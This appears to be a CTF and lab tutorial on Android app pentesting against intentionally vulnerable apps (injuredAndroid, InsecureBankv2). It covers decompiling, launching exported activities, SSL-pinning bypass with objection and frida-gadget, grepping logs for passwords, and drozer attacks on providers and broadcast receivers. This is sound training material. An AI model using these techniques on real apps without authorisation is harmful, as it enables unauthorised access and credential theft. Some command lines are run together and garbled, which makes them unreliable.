The Android Manifest is an XML file which contains important metadata about the Android app. This includes the package name, activity names, main activity (the entry point to the app), Android version support, hardware features support, permissions, and other configurations.
Decompiled APK
apktool d apkname.apk
┌─[sheinn101@parrot]─[~/ctf/android]└──╼ [??]$ apktool d injuredAndroid.apk I: Using Apktool 2.5.0-dirty on injuredAndroid.apkI: Loading resource table...I: Decoding AndroidManifest.xml with resources...I: Loading resource table from file:/home/sheinn101/.local/share/apktool/framework/1.apkI: Regular manifest package...I: Decoding file-resources...I: Decoding values */* XMLs...I: Baksmaling classes.dex...I: Copying assets and libs...I: Copying unknown files...I: Copying original files...┌─[sheinn101@parrot]─[~/ctf/android/injuredAndroid]└──╼ [??]$ lsAndroidManifest.xml apktool.yml assets kotlin lib original res smali unknown┌─[sheinn101@parrot]─[~/ctf/android/injuredAndroid]└──╼ [??]$
Find Hardcoded Strings
Often hardcoded strings can be found in resources/strings.xml and also in activity source code.Sometimes you may find client credentials, urls exposed, apikeys, firebase url, etc...
Exported Activity
An exported activity is the one that can be accessed by external components or apps. We can say that exported activities are like Public functions in Java, any other parent class or even package can call them. Let's say you are on your home screen and now you want to start the Twitter app so you’ll click on the app icon to invoke its launcher activity but technically you were already in some activity(home page) and then you started another activity(launching the Twitter app). Now if the launcher activity of the Twitter app isn’t exported(not public) then no one will be able to invoke the activity and the app won’t start. That is why there has to at least one activity exported so other components of android can start it.That can also be XSS attack.
Find android:exported=true in AndroidManifest.xml
Let's find ,we can access that activity anywhere from the phone (could be from different application).
To exploit this, enter adb shell and type this am start [activity name]
Don't forget to add forward slash in front of activity name /.b25lActivity
It will automatically pop up that activity in our phone.
In real world or bug bounty hunting , you need to make sure that activity has any sensitive data or can allow us some UI (like admin panel) which we don't have access to it.
When you find a firebase url , keep that in mind , may be there is some area are not protected. You can check with .json like this.
Dynamic Analysis
Disable SSL Pinning
Patching Apk using Objection
We can use objection for automatically patch the application to bypass SSL Pinning.
Installation : pip3 install objection
┌─[sheinn101@parrot]─[~/ctf/android]└──╼ [??]$ objection patchapk --source injuredAndroid.apk No architecture specified. Determining it using `adb`...Detected target device architecture as: arm64-v8aUsing latest Github gadget version:15.1.10Patcher will be usingGadget version:15.1.10Detected apktool version as:2.5.0-dirtyRunning apktool empty-framework-dir...I: Removing 1.apk framework file...Unpacking injuredAndroid.apkApp already has android.permission.INTERNETTarget classnotspecified, searchingforlaunchableactivityinstead...Readingsmalifrom: /tmp/tmpeohig7rk.apktemp/smali/b3nac/injuredandroid/MainActivity.smaliInjectingloadLibrarycallatline: 10Attemptingtofixtheconstructors .localscountCurrentlocalsvalueis 0, updatingto 1:Writingpatchedsmalibackto: /tmp/tmpeohig7rk.apktemp/smali/b3nac/injuredandroid/MainActivity.smaliCopyingFridagadgettolibspath...RebuildingtheAPKwiththefrida-gadgetloaded...RebuildingtheAPKmayhavefailed. Readthefollowingoutputtodetermineifapktoolactuallyhadanerror: BuiltnewAPKwithinjectedloadLibraryandfrida-gadgetPerformingzipalignZipaligncompletedSigningnewAPK.SignedthenewAPKCopying final apk from /tmp/tmpeohig7rk.apktemp.aligned.objection.apk to injuredAndroid.objection.apk in current directory...
Cleaninguptempfiles...
Sometime this method does not work properly. You can do manually to patch.
Manual Patching
Patch the apk with apktool
apktool -d apkname.apk and download frida-gadget.so from github.
# create keystorekeytool-genkey-v-keystoredemo.keystore-aliasdemokeys-keyalgRSA-keysize2048-validity10000# sign the apkjarsigner-sigalgSHA1withRSA-digestalgSHA1-keystoredemo.keystore-storepassdemopassinjured_patch.apkdemokeys# verify the signaturejarsigner-verifyinjured_patch.apk# zipalign the APKzipalign4injured_patch.apkinjured_path_final.apk
Install the apk in enumerator and then when you open that you will see white screen for a little while and type this command to hook with frida.
objection explore
Insecure Logging
> adb logcat -c (clear the log)
> adb logcat | grep "password"
Drozer usage
Port Forward
adb forward tcp:31415 tcp:31415
Connect Drozer
drozer console connect
Show App Info
run app.package.info -a com.android.insecurebankv2
Show Activity Info
run app.activity.info -a com.android.insecurebankv2
Show Content Provider
run app.provider.finduri com.android.insecurebankv2
Check Vulnerable Injection in Content Provider
run scanner.provider.injection -a com.android.insecurebankv2
Show Broadcast Receiver
run app.broadcast.info -a com.android.insecurebankv2 -i
run app.broadcast.send --action theBroadcast --extra string 095634534345--extra string newpass NewPassword
run app.package.attacksurface com.android.insecurebankv2
Run Acitivity Directly
run app.activity.start --component com.android.insecurebankv2 com.android.insecurebankv2.ViewStatement run activity directly
